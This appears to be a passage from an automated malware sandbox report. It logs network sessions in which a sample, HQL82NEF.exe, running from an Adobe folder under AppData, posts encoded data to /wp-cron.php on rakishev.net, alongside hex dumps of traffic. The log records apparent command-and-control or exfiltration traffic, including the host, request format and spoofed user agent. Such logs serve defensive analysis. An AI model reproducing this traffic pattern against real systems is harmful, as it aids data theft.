2023-10-03 20:34:59 UTC	2737	IN	Data Raw: 00 19 17 87 00 19 17 87 04 19 17 87 34 19 17 87 7c 18 16 86 ba 19 17 87 e1 4c 4b a2 f5 94 94 c7 fd b8 b7 da fd b0 af d6 f4 79 78 b9 df 2c 2b 91 b6 14 12 84 76 19 17 87 2d 19 17 87 01 19 17 87 00 18 15 89 00 19 17 87 00 00 00 00 00 00 00 00 00 00 00 00 00 19 17 87 00 19 17 87 00 19 17 87 00 19 17 87 2e 19 17 87 9b 19 17 87 e6 18 16 87 fe 1d 1b 89 ff 7d 7c bb ff e7 e6 f2 ff ff ff ff ff ff ff ff ff ff ff ff ff f7 f7 fb ff b5 b4 d8 ff 3a 38 98 fd 17 15 86 e1 19 17 87 8e 19 17 87 23 19 17 87 00 19 17 87 00 19 17 87 00 00 00 00 00 19 17 87 00 19 17 87 00 19 18 87 00 19 17 87 58 19 17 87 de 19 17 87 ff 19 17 87 ff 17 15 86 ff 71 6f b5 ff f8 f8 fb ff ff ff ff ff f6 f6 fa ff dc db ed ff e8 e8 f3 ff ff ff ff ff ff ff ff ff bd bc dc ff 28 26 8f ff 18 16 86 ff 19 17 Data Ascii: 4\|LKyx,+v-.}\|:8#Xqo(&
2023-10-03 20:34:59 UTC	2753	IN	Data Raw: 72 74 79 20 74 6f 20 73 65 74 20 77 68 65 6e 20 61 20 70 72 6f 64 75 63 74 20 69 6e 20 74 68 69 73 20 73 65 74 20 69 73 20 66 6f 75 6e 64 2e 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 46 69 6c 65 43 6f 73 74 43 6f 73 74 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 56 61 6c 69 64 61 74 65 49 6e 73 74 61 6c 6c 49 6e 69 74 69 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 41 64 6d 69 6e 50 61 63 6b 61 67 65 49 6e 73 74 61 6c 6c 46 69 6c 65 73 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 45 78 65 63 75 74 65 41 63 74 69 6f 6e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 73 50 75 62 6c 69 73 68 46 65 61 74 75 72 65 73 50 75 62 6c 69 73 68 50 72 6f 64 75 63 74 63 75 73 74 6f 6d 61 63 74 69 6f 6e 73 2e 64 6c 6c 57 69 72 65 47 75 61 72 64 45 78 65 63 75 74 61 62 6c 65 7b 43 33 Data Ascii: rty to set when a product in this set is found.CostInitializeFileCostCostFinalizeInstallValidateInstallInitializeInstallAdminPackageInstallFilesInstallFinalizeExecuteActionCreateShortcutsPublishFeaturesPublishProductcustomactions.dllWireGuardExecutable{C3
2023-10-03 20:34:59 UTC	2769	IN	Data Raw: 7d 63 7f ef 32 ec 46 87 63 db 9a 9f c3 5a 21 36 7b f9 9b d5 ca a0 6e 72 2c fc e1 f1 9e 70 4d 08 56 15 6f 90 ab fb 48 ba b9 d7 c1 82 78 85 65 2e 7f b5 c9 c0 e2 14 b7 37 11 41 06 e2 8a e0 a8 f6 e5 7e b6 78 05 01 c3 60 ed 4f 07 41 2e 0a 13 49 e3 90 9b 7f dd bd fa ac bf 64 51 d1 5c 9b b4 f5 5c e7 5c ff 3b 9b a5 a0 1a d7 7d 09 b2 c2 b7 ff 6e 1c bc c8 7d e6 e9 2b fc 72 b3 14 e9 4a 55 12 84 9c 44 25 75 1d f6 2a f0 4f a5 20 3d 68 25 eb 61 97 7c 0f e5 b6 3d f3 ae c3 c1 11 bc 1b 8e cc e0 47 30 5e 42 00 86 71 e3 58 ac 06 ca 65 1f 7b 94 a6 4b 57 67 0c 7e 5e ad 78 67 5b 55 e3 5e eb c7 d8 ec 4c 6e 86 cb f3 dc f8 9f 87 aa 72 58 12 0f 7d a6 f8 f8 42 39 3b 3c 2c e4 32 4d 49 8c e0 e1 00 c2 38 a0 9c fa 84 3e 41 dc 6e 56 ae c6 1a 5b f4 67 68 05 01 cd 1b bf ae 87 bc 9d 53 f6 Data Ascii: }c2FcZ!6{nr,pMVoHxe.7A~x`OA.IdQ\\\;}n}+rJUD%u*O =h%a\|=G0^BqXe{KWg~^xg[U^LnrX}B9;<,2MI8>AnV[ghS

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49832	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:22 UTC	2896	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 326 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:22 UTC	2897	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:22 UTC	2897	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:22 UTC	2897	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 76 74 34 42 41 59 30 68 5a 6e 63 58 58 41 25 32 42 6b 74 65 6c 46 57 63 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0Vvt4BAY0hZncXXA%2BktelFWc7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjy
2023-10-03 20:36:22 UTC	3008	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fKgiqxnzAa7XYcNK0pJk%2FdD8z1UUaVBBqLQjjAzfq0jp6pgTL%2FvyaFodym822C9FwVi7YkP6sBC8htBk2J%2Fx%2FvzcW8MHFDxPmZbuquSDDEaAe0UEDEHznUFIZ6jiXjY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa179d8f05ac-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49834	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:22 UTC	2896	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112852 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:22 UTC	2897	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:22 UTC	2897	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:22 UTC	2897	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 69 66 31 58 6e 41 54 71 63 49 41 61 6b 70 50 71 45 72 52 4f 4f 49 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUif1XnATqcIAakpPqErROOIIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:36:22 UTC	2913	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:36:22 UTC	2913	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:36:22 UTC	2929	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:36:22 UTC	2929	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:36:22 UTC	2945	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:36:22 UTC	2945	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:36:22 UTC	2961	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:36:22 UTC	2961	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:36:22 UTC	2977	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:36:22 UTC	2977	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:36:22 UTC	2993	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:36:22 UTC	2993	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:36:23 UTC	3009	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mhiYw4q5R0z2WQwa1yamL7jbbhTfSBe5oMEWokk5x6ukSBVnawKo8nUsGzylS0yw1Y8Io0EDRgmeDt7o9qA7iwg4DPmGjdfYchhX%2FadOvjMatot5USe2ccE3LA3O7i0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa17bb28396e-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49833	104.21.88.34	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:22 UTC	2896	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue
2023-10-03 20:36:22 UTC	3007	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:22 UTC	3007	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:22 UTC	3007	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:36:22 UTC	3008	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bo6DMcJgQkT0ztNvVZWsRkdBlKypVxtXatc3LUmVSdPx17qWMCrXm5lX%2B5ipJ9pVGKZya842L1cqIA1aQV%2Fvytb76Pqa6vMTkJ5TL%2FonJ9jdiPKnx%2BqqV2bdHYaF40Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa17c9910805-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49853	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:33 UTC	3009	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:34 UTC	3010	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:34 UTC	3010	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:34 UTC	3010	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:36:34 UTC	3010	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E6Z5m%2BQVNPm2E%2F%2F6xXXX3ucmL1bQ1uOG80hTM%2FqeEQa%2BTaOR%2FcOLh9G2%2B5Lz58D0KU1dbmn84Sh%2BZyyTMkm%2FRYtIqWWwPw%2F9JXMHrqCkKrMCVUVrS6oxksWaMuqRn4o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fa60bb738f2c-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49854	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:34 UTC	3010	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 326 Expect: 100-continue
2023-10-03 20:36:35 UTC	3011	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:35 UTC	3011	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:35 UTC	3011	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 59 5a 37 62 34 4b 55 5a 72 50 45 53 74 34 4b 4f 74 79 48 25 32 42 72 4d 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 Data Ascii: 